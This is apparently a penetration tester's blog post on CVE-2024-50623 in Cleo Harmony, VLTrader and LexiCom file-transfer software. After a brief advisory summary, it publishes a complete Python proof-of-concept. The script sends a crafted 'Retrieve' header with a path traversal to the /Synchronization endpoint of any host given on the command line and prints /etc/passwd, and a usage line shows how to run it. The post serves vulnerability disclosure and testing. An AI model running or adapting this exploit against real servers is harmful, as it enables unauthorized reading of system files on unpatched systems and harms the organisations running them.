congdong007

Penetration Test、Software Developer

0%

Cleo Harmony File Transfer Software Arbitrary File Read Vulnerability(CVE-2024-50623) POC

Posted on Edited on In , , 
Description

    Cleo has identified an unrestricted file upload and download vulnerability (CVE-2024-50623) that could lead to remote code execution.

    The vulnerability affects the following products:

    Cleo Harmony® (prior to version 5.8.0.21)
    Cleo VLTrader® (prior to version 5.8.0.21)
    Cleo LexiCom® (prior to version 5.8.0.21)
    Cleo strongly advises all customers to immediately upgrade instances of Harmony, VLTrader, and LexiCom to the latest released patch (version 5.8.0.21) to address additional discovered potential attack vectors of the vulnerability. 

    Please visit Unrestricted File Upload and Download Vulnerability Mitigation to take immediate action.

Scope of impact


Proof of Concept (Python Code)


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
# Title: Cleo Harmony File Transfer Software Arbitrary File Read Vulnerability(CVE-2024-50623)
# Date : 2025-04-01
# Author: Dong Cong
#         
#         ZXJpYy5jb25nZG9uZ0BnbWFpbC5jb20=
# 
# CVE : 2024-50623

#!/usr/bin/python3    

import requests
import argparse
import warnings

warnings.filterwarnings("ignore")

url0 = '/Synchronization'

parser=argparse.ArgumentParser()
parser.add_argument("--host", help="input the vulnerable host", type=str)
args = parser.parse_args()

# http://xx.xx.xx.xx:xxxx
host = args.host

print(host)


cookies = {
    'csrftoken': 'z1GtnjQWsIKwGazlFX7V',
    'csrftoken': 'NX6iujIUcamW9umprA1vx19dzU6EZNLa',
    'csrftoken': 'kZ4jVQ4uZtITYtnweSsVDUEwZ2ltraTF',
}

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0',
    'Accept': '*/*',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Connection': 'keep-alive',
    'Priority': 'u=4',
    'Retrieve': 'l=Ab1234-RQ0258;n=VLTrader;v=7.2.1;a=1337;po=1337;s=True;b=False;pp=1337;path=../../etc/passwd',
}


try:
    response = requests.get(f'{host}{url0}', cookies=cookies, headers=headers,timeout=5)
    if response.status_code == 200:
        print(f'************************ {len(response.text)} ************************\n')
        print(response.text)
except requests.exceptions.HTTPError as http_err:
    print(f"HTTP 错误: {http_err}")
except requests.exceptions.ConnectionError as conn_err:
    print(f"连接错误: {conn_err}")
except requests.exceptions.Timeout as timeout_err:
    print(f"请求超时: {timeout_err}")
except requests.exceptions.RequestException as req_err:
    print(f"请求错误: {req_err}")          


The following code demonstrates how to execute the script:


1
python test_poc.py --host http://192.168.0.1:8983